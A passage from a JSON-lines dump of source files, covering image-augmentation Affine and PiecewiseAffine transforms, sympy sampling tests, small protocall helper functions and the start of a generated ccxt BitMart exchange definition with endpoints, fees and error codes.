resulting in samples that differ between the axes.\n translate_px (None, int, tuple of int or dict): Translation in pixels.\n * If ``None`` then equivalent to ``0`` unless `translate_percent` has a value other than ``None``.\n * If a single int, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from\n the discrete interval ``[a..b]``. That number will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n rotate (number or tuple of number): Rotation in degrees (**NOT** radians), i.e. expected value range is\n around ``[-360, 360]``. Rotation happens around the *center* of the image,\n not the top left corner as in some other frameworks.\n * If a number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``\n and used as the rotation value.\n shear (number, tuple of number or dict): Shear in degrees (**NOT** radians), i.e. expected value range is\n around ``[-360, 360]``, with reasonable values being in the range of ``[-45, 45]``.\n * If a number, then that value will be used for all images as\n the shear on the x-axis (no shear on the y-axis will be done).\n * If a tuple ``(a, b)``, then two value will be uniformly sampled per image\n from the interval ``[a, b]`` and be used as the x- and y-shear value.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n interpolation (int): OpenCV interpolation flag.\n mask_interpolation (int): OpenCV interpolation flag.\n cval (number or sequence of number): The constant value to use when filling in newly created pixels.\n (E.g. translating by 1px to the right will create a new 1px-wide column of pixels\n on the left of the image).\n The value is only used when `mode=constant`. The expected value range is ``[0, 255]`` for ``uint8`` images.\n cval_mask (number or tuple of number): Same as cval but only for masks.\n mode (int): OpenCV border flag.\n fit_output (bool): Whether to modify the affine transformation so that the whole output image is always\n contained in the image plane (``True``) or accept parts of the image being outside\n the image plane (``False``). This can be thought of as first applying the affine transformation\n and then applying a second transformation to \"zoom in\" on the new image so that it fits the image plane,\n This is useful to avoid corners of the image being outside of the image plane after applying rotations.\n It will however negate translation and scaling.\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n \"\"\"\n\n def __init__(\n self,\n scale: Optional[Union[float, Sequence[float], dict]] = None,\n translate_percent: Optional[Union[float, Sequence[float], dict]] = None,\n translate_px: Optional[Union[int, Sequence[int], dict]] = None,\n rotate: Optional[Union[float, Sequence[float]]] = None,\n shear: Optional[Union[float, Sequence[float], dict]] = None,\n interpolation: int = cv2.INTER_LINEAR,\n mask_interpolation: int = cv2.INTER_NEAREST,\n cval: Union[int, float, Sequence[int], Sequence[float]] = 0,\n cval_mask: Union[int, float, Sequence[int], Sequence[float]] = 0,\n mode: int = cv2.BORDER_CONSTANT,\n fit_output: bool = False,\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super().__init__(always_apply=always_apply, p=p)\n\n params = [scale, translate_percent, translate_px, rotate, shear]\n if all([p is None for p in params]):\n scale = {\"x\": (0.9, 1.1), \"y\": (0.9, 1.1)}\n translate_percent = {\"x\": (-0.1, 0.1), \"y\": (-0.1, 0.1)}\n rotate = (-15, 15)\n shear = {\"x\": (-10, 10), \"y\": (-10, 10)}\n else:\n scale = scale if scale is not None else 1.0\n rotate = rotate if rotate is not None else 0.0\n shear = shear if shear is not None else 0.0\n\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.scale = self._handle_dict_arg(scale, \"scale\")\n self.translate_percent, self.translate_px = self._handle_translate_arg(translate_px, translate_percent)\n self.rotate = to_tuple(rotate, rotate)\n self.fit_output = fit_output\n self.shear = self._handle_dict_arg(shear, \"shear\")\n\n def get_transform_init_args_names(self):\n return (\n \"interpolation\",\n \"mask_interpolation\",\n \"cval\",\n \"mode\",\n \"scale\",\n \"translate_percent\",\n \"translate_px\",\n \"rotate\",\n \"fit_output\",\n \"shear\",\n \"cval_mask\",\n )\n\n @staticmethod\n def _handle_dict_arg(val: Union[float, Sequence[float], dict], name: str):\n if isinstance(val, dict):\n if \"x\" not in val and \"y\" not in val:\n raise ValueError(\n f'Expected {name} dictionary to contain at least key \"x\" or ' 'key \"y\". Found neither of them.'\n )\n x = val.get(\"x\", 1.0)\n y = val.get(\"y\", 1.0)\n return {\"x\": to_tuple(x, x), \"y\": to_tuple(y, y)}\n return {\"x\": to_tuple(val, val), \"y\": to_tuple(val, val)}\n\n @classmethod\n def _handle_translate_arg(\n cls,\n translate_px: Optional[Union[float, Sequence[float], dict]],\n translate_percent: Optional[Union[float, Sequence[float], dict]],\n ):\n if translate_percent is None and translate_px is None:\n translate_px = 0\n\n if translate_percent is not None and translate_px is not None:\n raise ValueError(\n \"Expected either translate_percent or translate_px to be \" \"provided, \" \"but neither of them was.\"\n )\n\n if translate_percent is not None:\n # translate by percent\n return cls._handle_dict_arg(translate_percent, \"translate_percent\"), translate_px\n\n if translate_px is None:\n raise ValueError(\"translate_px is None.\")\n # translate by pixels\n return translate_percent, cls._handle_dict_arg(translate_px, \"translate_px\")\n\n def apply(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = None,\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.interpolation,\n cval=self.cval,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_mask(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = None,\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.mask_interpolation,\n cval=self.cval_mask,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_bbox(\n self,\n bbox: Sequence[float],\n matrix: skimage.transform.ProjectiveTransform = None,\n rows: int = 0,\n cols: int = 0,\n output_shape: Sequence[int] = (),\n **params\n ) -> Sequence[float]:\n return F.bbox_affine(bbox, matrix, rows, cols, output_shape)\n\n def apply_to_keypoint(\n self,\n keypoint: Sequence[float],\n matrix: skimage.transform.ProjectiveTransform = None,\n scale: dict = None,\n **params\n ) -> Sequence[float]:\n return F.keypoint_affine(keypoint, matrix=matrix, scale=scale)\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params: dict) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n translate: Dict[str, Union[int, float]]\n if self.translate_px is not None:\n translate = {key: random.randint(*value) for key, value in self.translate_px.items()}\n elif self.translate_percent is not None:\n translate = {key: random.uniform(*value) for key, value in self.translate_percent.items()}\n translate[\"x\"] = translate[\"x\"] * w\n translate[\"y\"] = translate[\"y\"] * h\n else:\n translate = {\"x\": 0, \"y\": 0}\n\n shear = {key: random.uniform(*value) for key, value in self.shear.items()}\n scale = {key: random.uniform(*value) for key, value in self.scale.items()}\n rotate = random.uniform(*self.rotate)\n\n # for images we use additional shifts of (0.5, 0.5) as otherwise\n # we get an ugly black border for 90deg rotations\n shift_x = w / 2 - 0.5\n shift_y = h / 2 - 0.5\n\n matrix_to_topleft = skimage.transform.SimilarityTransform(translation=[-shift_x, -shift_y])\n matrix_shear_y_rot = skimage.transform.AffineTransform(rotation=-np.pi / 2)\n matrix_shear_y = skimage.transform.AffineTransform(shear=np.deg2rad(shear[\"y\"]))\n matrix_shear_y_rot_inv = skimage.transform.AffineTransform(rotation=np.pi / 2)\n matrix_transforms = skimage.transform.AffineTransform(\n scale=(scale[\"x\"], scale[\"y\"]),\n translation=(translate[\"x\"], translate[\"y\"]),\n rotation=np.deg2rad(rotate),\n shear=np.deg2rad(shear[\"x\"]),\n )\n matrix_to_center = skimage.transform.SimilarityTransform(translation=[shift_x, shift_y])\n matrix = (\n matrix_to_topleft\n + matrix_shear_y_rot\n + matrix_shear_y\n + matrix_shear_y_rot_inv\n + matrix_transforms\n + matrix_to_center\n )\n if self.fit_output:\n matrix, output_shape = self._compute_affine_warp_output_shape(matrix, params[\"image\"].shape)\n else:\n output_shape = params[\"image\"].shape\n\n return {\n \"rotate\": rotate,\n \"scale\": scale,\n \"matrix\": matrix,\n \"output_shape\": output_shape,\n }\n\n @staticmethod\n def _compute_affine_warp_output_shape(\n matrix: skimage.transform.ProjectiveTransform, input_shape: Sequence[int]\n ) -> Tuple[skimage.transform.ProjectiveTransform, Sequence[int]]:\n height, width = input_shape[:2]\n\n if height == 0 or width == 0:\n return matrix, input_shape\n\n # determine shape of output image\n corners = np.array([[0, 0], [0, height - 1], [width - 1, height - 1], [width - 1, 0]])\n corners = matrix(corners)\n minc = corners[:, 0].min()\n minr = corners[:, 1].min()\n maxc = corners[:, 0].max()\n maxr = corners[:, 1].max()\n out_height = maxr - minr + 1\n out_width = maxc - minc + 1\n if len(input_shape) == 3:\n output_shape = np.ceil((out_height, out_width, input_shape[2]))\n else:\n output_shape = np.ceil((out_height, out_width))\n output_shape_tuple = tuple([int(v) for v in output_shape.tolist()])\n # fit output image in new shape\n translation = (-minc, -minr)\n matrix_to_fit = skimage.transform.SimilarityTransform(translation=translation)\n matrix = matrix + matrix_to_fit\n return matrix, output_shape_tuple\n\n\nclass PiecewiseAffine(DualTransform):\n \"\"\"Apply affine transformations that differ between local neighbourhoods.\n This augmentation places a regular grid of points on an image and randomly moves the neighbourhood of these point\n around via affine transformations. This leads to local distortions.\n\n This is mostly a wrapper around scikit-image's ``PiecewiseAffine``.\n See also ``Affine`` for a similar technique.\n\n Note:\n This augmenter is very slow. Try to use ``ElasticTransformation`` instead, which is at least 10x faster.\n\n Note:\n For coordinate-based inputs (keypoints, bounding boxes, polygons, ...),\n this augmenter still has to perform an image-based augmentation,\n which will make it significantly slower and not fully correct for such inputs than other transforms.\n\n Args:\n scale (float, tuple of float): Each point on the regular grid is moved around via a normal distribution.\n This scale factor is equivalent to the normal distribution's sigma.\n Note that the jitter (how far each point is moved in which direction) is multiplied by the height/width of\n the image if ``absolute_scale=False`` (default), so this scale can be the same for different sized images.\n Recommended values are in the range ``0.01`` to ``0.05`` (weak to strong augmentations).\n * If a single ``float``, then that value will always be used as the scale.\n * If a tuple ``(a, b)`` of ``float`` s, then a random value will\n be uniformly sampled per image from the interval ``[a, b]``.\n nb_rows (int, tuple of int): Number of rows of points that the regular grid should have.\n Must be at least ``2``. For large images, you might want to pick a higher value than ``4``.\n You might have to then adjust scale to lower values.\n * If a single ``int``, then that value will always be used as the number of rows.\n * If a tuple ``(a, b)``, then a value from the discrete interval\n ``[a..b]`` will be uniformly sampled per image.\n nb_cols (int, tuple of int): Number of columns. Analogous to `nb_rows`.\n interpolation (int): The order of interpolation. The order has to be in the range 0-5:\n - 0: Nearest-neighbor\n - 1: Bi-linear (default)\n - 2: Bi-quadratic\n - 3: Bi-cubic\n - 4: Bi-quartic\n - 5: Bi-quintic\n mask_interpolation (int): same as interpolation but for mask.\n cval (number): The constant value to use when filling in newly created pixels.\n cval_mask (number): Same as cval but only for masks.\n mode (str): {'constant', 'edge', 'symmetric', 'reflect', 'wrap'}, optional\n Points outside the boundaries of the input are filled according\n to the given mode. Modes match the behaviour of `numpy.pad`.\n absolute_scale (bool): Take `scale` as an absolute value rather than a relative value.\n keypoints_threshold (float): Used as threshold in conversion from distance maps to keypoints.\n The search for keypoints works by searching for the\n argmin (non-inverted) or argmax (inverted) in each channel. This\n parameters contains the maximum (non-inverted) or minimum (inverted) value to accept in order to view a hit\n as a keypoint. Use ``None`` to use no min/max. Default: 0.01\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n \"\"\"\n\n def __init__(\n self,\n scale: Union[float, Sequence[float]] = (0.03, 0.05),\n nb_rows: Union[int, Sequence[int]] = 4,\n nb_cols: Union[int, Sequence[int]] = 4,\n interpolation: int = 1,\n mask_interpolation: int = 0,\n cval: int = 0,\n cval_mask: int = 0,\n mode: str = \"constant\",\n absolute_scale: bool = False,\n always_apply: bool = False,\n keypoints_threshold: float = 0.01,\n p: float = 0.5,\n ):\n super(PiecewiseAffine, self).__init__(always_apply, p)\n\n self.scale = to_tuple(scale, scale)\n self.nb_rows = to_tuple(nb_rows, nb_rows)\n self.nb_cols = to_tuple(nb_cols, nb_cols)\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.absolute_scale = absolute_scale\n self.keypoints_threshold = keypoints_threshold\n\n def get_transform_init_args_names(self):\n return (\n \"scale\",\n \"nb_rows\",\n \"nb_cols\",\n \"interpolation\",\n \"mask_interpolation\",\n \"cval\",\n \"cval_mask\",\n \"mode\",\n \"absolute_scale\",\n \"keypoints_threshold\",\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n nb_rows = np.clip(random.randint(*self.nb_rows), 2, None)\n nb_cols = np.clip(random.randint(*self.nb_cols), 2, None)\n nb_cells = nb_cols * nb_rows\n scale = random.uniform(*self.scale)\n\n state = np.random.RandomState(random.randint(0, 1 << 31))\n jitter = state.normal(0, scale, (nb_cells, 2))\n if not np.any(jitter > 0):\n return {\"matrix\": None}\n\n y = np.linspace(0, h, nb_rows)\n x = np.linspace(0, w, nb_cols)\n\n # (H, W) and (H, W) for H=rows, W=cols\n xx_src, yy_src = np.meshgrid(x, y)\n\n # (1, HW, 2) => (HW, 2) for H=rows, W=cols\n points_src = np.dstack([yy_src.flat, xx_src.flat])[0]\n\n if self.absolute_scale:\n jitter[:, 0] = jitter[:, 0] / h if h > 0 else 0.0\n jitter[:, 1] = jitter[:, 1] / w if w > 0 else 0.0\n\n jitter[:, 0] = jitter[:, 0] * h\n jitter[:, 1] = jitter[:, 1] * w\n\n points_dest = np.copy(points_src)\n points_dest[:, 0] = points_dest[:, 0] + jitter[:, 0]\n points_dest[:, 1] = points_dest[:, 1] + jitter[:, 1]\n\n # Restrict all destination points to be inside the image plane.\n # This is necessary, as otherwise keypoints could be augmented\n # outside of the image plane and these would be replaced by\n # (-1, -1), which would not conform with the behaviour of the other augmenters.\n points_dest[:, 0] = np.clip(points_dest[:, 0], 0, h - 1)\n points_dest[:, 1] = np.clip(points_dest[:, 1], 0, w - 1)\n\n matrix = skimage.transform.PiecewiseAffineTransform()\n matrix.estimate(points_src[:, ::-1], points_dest[:, ::-1])\n\n return {\n \"matrix\": matrix,\n }\n\n def apply(\n self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params\n ) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.interpolation, self.mode, self.cval)\n\n def apply_to_mask(\n self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params\n ) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.mask_interpolation, self.mode, self.cval_mask)\n\n def apply_to_bbox(\n self,\n bbox: Sequence[float],\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ) -> Sequence[float]:\n return F.bbox_piecewise_affine(bbox, matrix, rows, cols, self.keypoints_threshold)\n\n def apply_to_keypoint(\n self,\n keypoint: Sequence[float],\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ):\n return F.keypoint_piecewise_affine(keypoint, matrix, rows, cols, self.keypoints_threshold)\n"} {"ext": "py", "sha": "1a312d2507aa36ff7f594066f5f8334771b8fc17", "content": "from sympy import S, Rational\nfrom sympy.external import import_module\nfrom sympy.stats import Binomial, sample, Die, FiniteRV, DiscreteUniform, Bernoulli, BetaBinomial, Hypergeometric, \\\n Rademacher\nfrom sympy.testing.pytest import skip, raises\n\ndef test_given_sample():\n X = Die('X', 6)\n scipy = import_module('scipy')\n if not scipy:\n skip('Scipy is not installed. Abort tests')\n assert sample(X, X > 5) == 6\n\ndef test_sample_numpy():\n distribs_numpy = [\n Binomial(\"B\", 5, 0.4),\n ]\n size = 3\n numpy = import_module('numpy')\n if not numpy:\n skip('Numpy is not installed. Abort tests for _sample_numpy.')\n else:\n for X in distribs_numpy:\n samps = sample(X, size=size, library='numpy')\n for sam in samps:\n assert sam in X.pspace.domain.set\n raises(NotImplementedError,\n lambda: sample(Die(\"D\"), library='numpy'))\n raises(NotImplementedError,\n lambda: Die(\"D\").pspace.sample(library='tensorflow'))\n\n\ndef test_sample_scipy():\n distribs_scipy = [\n FiniteRV('F', {1: S.Half, 2: Rational(1, 4), 3: Rational(1, 4)}),\n DiscreteUniform(\"Y\", list(range(5))),\n Die(\"D\"),\n Bernoulli(\"Be\", 0.3),\n Binomial(\"Bi\", 5, 0.4),\n BetaBinomial(\"Bb\", 2, 1, 1),\n Hypergeometric(\"H\", 1, 1, 1),\n Rademacher(\"R\")\n ]\n\n size = 3\n scipy = import_module('scipy')\n if not scipy:\n skip('Scipy not installed. Abort tests for _sample_scipy.')\n else:\n for X in distribs_scipy:\n samps = sample(X, size=size)\n samps2 = sample(X, size=(2, 2))\n for sam in samps:\n assert sam in X.pspace.domain.set\n for i in range(2):\n for j in range(2):\n assert samps2[i][j] in X.pspace.domain.set\n\n\ndef test_sample_pymc3():\n distribs_pymc3 = [\n Bernoulli('B', 0.2),\n Binomial('N', 5, 0.4)\n ]\n size = 3\n pymc3 = import_module('pymc3')\n if not pymc3:\n skip('PyMC3 is not installed. Abort tests for _sample_pymc3.')\n else:\n for X in distribs_pymc3:\n samps = sample(X, size=size, library='pymc3')\n for sam in samps:\n assert sam in X.pspace.domain.set\n raises(NotImplementedError,\n lambda: (sample(Die(\"D\"), library='pymc3')))\n\n\ndef test_sample_seed():\n F = FiniteRV('F', {1: S.Half, 2: Rational(1, 4), 3: Rational(1, 4)})\n size = 10\n libraries = ['scipy', 'numpy', 'pymc3']\n for lib in libraries:\n try:\n imported_lib = import_module(lib)\n if imported_lib:\n s0 = sample(F, size=size, library=lib, seed=0)\n s1 = sample(F, size=size, library=lib, seed=0)\n s2 = sample(F, size=size, library=lib, seed=1)\n assert all(s0 == s1)\n assert not all(s1 == s2)\n except NotImplementedError:\n continue\n"} {"ext": "py", "sha": "1a312d664f95be9471d53c006c172531cdd91ca1", "content": "# Copyright 2016 Google Inc. All Rights Reserved.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom protocall.proto import protocall_pb2\nfrom value import value\n\ndef print_(arguments, symbols):\n for arg in arguments:\n name = arg[0]\n atom = arg[1]\n print \"%s: %s\" % (name, value(atom))\n print\n return None\n\ndef double(arguments, symbols):\n arg = arguments[0]\n name = arg[0]\n atom = arg[1]\n \n a = protocall_pb2.Atom()\n a.literal.integer.value = atom.literal.integer.value * 2\n return a\n\ndef append(arguments, symbols):\n list_ = arguments[0]\n item = arguments[1]\n e = list_[1].literal.array.element.add()\n e.atom.CopyFrom(item[1])\n return e\n"} {"ext": "py", "sha": "1a312d8e7908a6ff686681158b2b3737cdb976c6", "content": "# -*- coding: utf-8 -*-\n\n# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:\n# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code\n\nfrom ccxt.base.exchange import Exchange\n\n# -----------------------------------------------------------------------------\n\ntry:\n basestring # Python 3\nexcept NameError:\n basestring = str # Python 2\nimport math\nfrom ccxt.base.errors import ExchangeError\nfrom ccxt.base.errors import AuthenticationError\nfrom ccxt.base.errors import PermissionDenied\nfrom ccxt.base.errors import AccountSuspended\nfrom ccxt.base.errors import ArgumentsRequired\nfrom ccxt.base.errors import BadRequest\nfrom ccxt.base.errors import BadSymbol\nfrom ccxt.base.errors import InsufficientFunds\nfrom ccxt.base.errors import InvalidAddress\nfrom ccxt.base.errors import InvalidOrder\nfrom ccxt.base.errors import OrderNotFound\nfrom ccxt.base.errors import NotSupported\nfrom ccxt.base.errors import RateLimitExceeded\nfrom ccxt.base.errors import ExchangeNotAvailable\nfrom ccxt.base.errors import InvalidNonce\nfrom ccxt.base.decimal_to_precision import ROUND\nfrom ccxt.base.decimal_to_precision import TRUNCATE\nfrom ccxt.base.decimal_to_precision import TICK_SIZE\n\n\nclass bitmart(Exchange):\n\n def describe(self):\n return self.deep_extend(super(bitmart, self).describe(), {\n 'id': 'bitmart',\n 'name': 'BitMart',\n 'countries': ['US', 'CN', 'HK', 'KR'],\n 'rateLimit': 250, # a bit slower than 50 times per second ~40 times per second\n 'version': 'v1',\n 'certified': True,\n 'pro': True,\n 'has': {\n 'cancelAllOrders': True,\n 'cancelOrder': True,\n 'cancelOrders': True,\n 'createOrder': True,\n 'fetchBalance': True,\n 'fetchCanceledOrders': True,\n 'fetchClosedOrders': True,\n 'fetchCurrencies': True,\n 'fetchDepositAddress': True,\n 'fetchDeposits': True,\n 'fetchFundingFee': True,\n 'fetchMarkets': True,\n 'fetchMyTrades': True,\n 'fetchOHLCV': True,\n 'fetchOpenOrders': True,\n 'fetchOrder': True,\n 'fetchOrderBook': True,\n 'fetchOrders': True,\n 'fetchOrderTrades': True,\n 'fetchStatus': True,\n 'fetchTicker': True,\n 'fetchTickers': True,\n 'fetchTime': True,\n 'fetchTrades': True,\n 'fetchWithdrawals': True,\n 'withdraw': True,\n },\n 'hostname': 'bitmart.com', # bitmart.info, bitmart.news for Hong Kong users\n 'urls': {\n 'logo': 'https://user-images.githubusercontent.com/1294454/129991357-8f47464b-d0f4-41d6-8a82-34122f0d1398.jpg',\n 'api': {\n 'rest': 'https://api-cloud.{hostname}', # bitmart.info for Hong Kong users\n },\n 'www': 'https://www.bitmart.com/',\n 'doc': 'https://developer-pro.bitmart.com/',\n 'referral': {\n 'url': 'http://www.bitmart.com/?r=rQCFLh',\n 'discount': 0.3,\n },\n 'fees': 'https://www.bitmart.com/fee/en',\n },\n 'requiredCredentials': {\n 'apiKey': True,\n 'secret': True,\n 'uid': True,\n },\n 'api': {\n 'public': {\n 'system': {\n 'get': {\n 'time': 5, # https://api-cloud.bitmart.com/system/time\n 'service': 5, # https://api-cloud.bitmart.com/system/service\n },\n },\n 'account': {\n 'get': {\n 'currencies': 10, # https://api-cloud.bitmart.com/account/v1/currencies\n },\n },\n 'spot': {\n 'get': {\n 'currencies': 1,\n 'symbols': 1,\n 'symbols/details': 1,\n 'ticker': 1, # ?symbol=BTC_USDT\n 'steps': 1, # ?symbol=BMX_ETH\n 'symbols/kline': 1, # ?symbol=BMX_ETH&step=15&from=1525760116&to=1525769116\n 'symbols/book': 1, # ?symbol=BMX_ETH&precision=6\n 'symbols/trades': 1, # ?symbol=BMX_ETH\n },\n },\n 'contract': {\n 'get': {\n 'tickers': 0.5,\n },\n },\n },\n 'private': {\n 'account': {\n 'get': {\n 'wallet': 0.5, # ?account_type=1\n 'deposit/address': 1, # ?currency=USDT-TRC20\n 'withdraw/charge': 1, # ?currency=BTC\n 'deposit-withdraw/history': 1, # ?limit=10&offset=1&operationType=withdraw\n 'deposit-withdraw/detail': 1, # ?id=1679952\n },\n 'post': {\n 'withdraw/apply': 1,\n },\n },\n 'spot': {\n 'get': {\n 'wallet': 0.5,\n 'order_detail': 0.1,\n 'orders': 0.5,\n 'trades': 0.5,\n },\n 'post': {\n 'submit_order': 0.1, # https://api-cloud.bitmart.com/spot/v1/submit_order\n 'cancel_order': 0.1, # https://api-cloud.bitmart.com/spot/v2/cancel_order\n 'cancel_orders': 0.1,\n },\n },\n },\n },\n 'timeframes': {\n '1m': 1,\n '3m': 3,\n '5m': 5,\n '15m': 15,\n '30m': 30,\n '45m': 45,\n '1h': 60,\n '2h': 120,\n '3h': 180,\n '4h': 240,\n '1d': 1440,\n '1w': 10080,\n '1M': 43200,\n },\n 'fees': {\n 'trading': {\n 'tierBased': True,\n 'percentage': True,\n 'taker': self.parse_number('0.0025'),\n 'maker': self.parse_number('0.0025'),\n 'tiers': {\n 'taker': [\n [self.parse_number('0'), self.parse_number('0.0020')],\n [self.parse_number('10'), self.parse_number('0.18')],\n [self.parse_number('50'), self.parse_number('0.0016')],\n [self.parse_number('250'), self.parse_number('0.0014')],\n [self.parse_number('1000'), self.parse_number('0.0012')],\n [self.parse_number('5000'), self.parse_number('0.0010')],\n [self.parse_number('25000'), self.parse_number('0.0008')],\n [self.parse_number('50000'), self.parse_number('0.0006')],\n ],\n 'maker': [\n [self.parse_number('0'), self.parse_number('0.001')],\n [self.parse_number('10'), self.parse_number('0.0009')],\n [self.parse_number('50'), self.parse_number('0.0008')],\n [self.parse_number('250'), self.parse_number('0.0007')],\n [self.parse_number('1000'), self.parse_number('0.0006')],\n [self.parse_number('5000'), self.parse_number('0.0005')],\n [self.parse_number('25000'), self.parse_number('0.0004')],\n [self.parse_number('50000'), self.parse_number('0.0003')],\n ],\n },\n },\n },\n 'precisionMode': TICK_SIZE,\n 'exceptions': {\n 'exact': {\n # general errors\n '30000': ExchangeError, # 404, Not found\n '30001': AuthenticationError, # 401, Header X-BM-KEY is empty\n '30002': AuthenticationError, # 401, Header X-BM-KEY not found\n '30003': AccountSuspended, # 401, Header X-BM-KEY has frozen\n '30004': AuthenticationError, # 401, Header X-BM-SIGN is empty\n '30005': AuthenticationError, # 401, Header X-BM-SIGN is wrong\n '30006': AuthenticationError, # 401, Header X-BM-TIMESTAMP is empty\n '30007': AuthenticationError, # 401, Header X-BM-TIMESTAMP range. Within a minute\n '30008': AuthenticationError, # 401, Header X-BM-TIMESTAMP invalid format\n '30010': PermissionDenied, # 403, IP is forbidden. We recommend enabling IP whitelist for API trading. After that reauth your account\n '30011': AuthenticationError, # 403, Header X-BM-KEY over expire time\n '30012': AuthenticationError, # 403, Header X-BM-KEY is forbidden to request it\n '30013': RateLimitExceeded, # 429, Request too many requests\n '30014': ExchangeNotAvailable, # 503, Service unavailable\n # funding account errors\n '60000': BadRequest, # 400, Invalid request(maybe the body is empty, or the int parameter passes string data)\n '60001': BadRequest, # 400, Asset account type does not exist\n '60002': BadRequest, # 400, currency does not exist\n '60003': ExchangeError, # 400, Currency has been closed recharge channel, if there is any problem, please consult customer service\n '60004': ExchangeError, # 400, Currency has been closed withdraw channel, if there is any problem, please consult customer service\n '60005': ExchangeError, # 400, Minimum amount is %s\n '60006': ExchangeError, # 400, Maximum withdraw precision is %d\n '60007': InvalidAddress, # 400, Only withdrawals from added addresses are allowed\n '60008': InsufficientFunds, # 400, Balance not enough\n '60009': ExchangeError, # 400, Beyond the limit\n '60010': ExchangeError, # 400, Withdraw id or deposit id not found\n '60011': InvalidAddress, # 400, Address is not valid\n '60012': ExchangeError, # 400, This action is not supported in self currency(If IOTA, HLX recharge and withdraw calls are prohibited)\n '60020': PermissionDenied, # 403, Your account is not allowed to recharge\n '60021': PermissionDenied, # 403, Your account is not allowed to withdraw\n '60022': PermissionDenied, # 403, No withdrawals for 24 hours\n '60030': BadRequest, # 405, Method Not Allowed\n '60031': BadRequest, # 415, Unsupported Media Type\n '60050': ExchangeError, # 500, User account not found\n '60051': ExchangeError, # 500, Internal Server Error\n # spot errors\n '50000': BadRequest, # 400, Bad Request\n '50001': BadSymbol, # 400, Symbol not found\n '50002': BadRequest, # 400, From Or To format error\n '50003': BadRequest, # 400, Step format error\n '50004': BadRequest, # 400, Kline size over 500\n '50005': OrderNotFound, # 400, Order Id not found\n '50006': InvalidOrder, # 400, Minimum size is %s\n '50007': InvalidOrder, # 400, Maximum size is %s\n '50008': InvalidOrder, # 400, Minimum price is %s\n '50009': InvalidOrder, # 400, Minimum count*price is %s\n '50010': InvalidOrder, # 400, RequestParam size is required\n '50011': InvalidOrder, # 400, RequestParam price is required\n '50012': InvalidOrder, # 400, RequestParam notional is required\n '50013': InvalidOrder, # 400, Maximum limit*offset is %d\n '50014': BadRequest, # 400, RequestParam limit is required\n '50015': BadRequest, # 400, Minimum limit is 1\n '50016': BadRequest, # 400, Maximum limit is %d\n '50017': BadRequest, # 400, RequestParam offset is required\n '50018': BadRequest, # 400, Minimum offset is 1\n '50019': BadRequest, # 400, Maximum price is %s\n # '50019': ExchangeError, # 400, Invalid status. validate status is [1=Failed, 2=Success, 3=Frozen Failed, 4=Frozen Success, 5=Partially Filled, 6=Fully Fulled, 7=Canceling, 8=Canceled\n '50020': InsufficientFunds, # 400, Balance not enough\n '50021': BadRequest, # 400, Invalid %s\n '50022': ExchangeNotAvailable, # 400, Service unavailable\n '50023': BadSymbol, # 400, This Symbol can't place order by api\n '50029': InvalidOrder, # {\"message\":\"param not match : size * price >=1000\",\"code\":50029,\"trace\":\"f931f030-b692-401b-a0c5-65edbeadc598\",\"data\":{}}\n '50030': InvalidOrder, # {\"message\":\"Order is already canceled\",\"code\":50030,\"trace\":\"8d6f64ee-ad26-45a4-9efd-1080f9fca1fa\",\"data\":{}}\n '53000': AccountSuspended, # 403, Your account is frozen due to security policies. Please contact customer service\n '53001': AccountSuspended, # {\"message\":\"Your kyc country is restricted. Please contact customer service.\",\"code\":53001,\"trace\":\"8b445940-c123-4de9-86d7-73c5be2e7a24\",\"data\":{}}\n '57001': BadRequest, # 405, Method Not Allowed\n '58001': BadRequest, # 415, Unsupported Media Type\n '59001': ExchangeError, # 500, User account not found\n '59002': ExchangeError, # 500, Internal Server Error\n # contract errors\n '40001': ExchangeError, # 400, Cloud account not found\n '40002': ExchangeError, # 400, out_trade_no not found\n '40003': ExchangeError, # 400, out_trade_no already existed\n '40004': 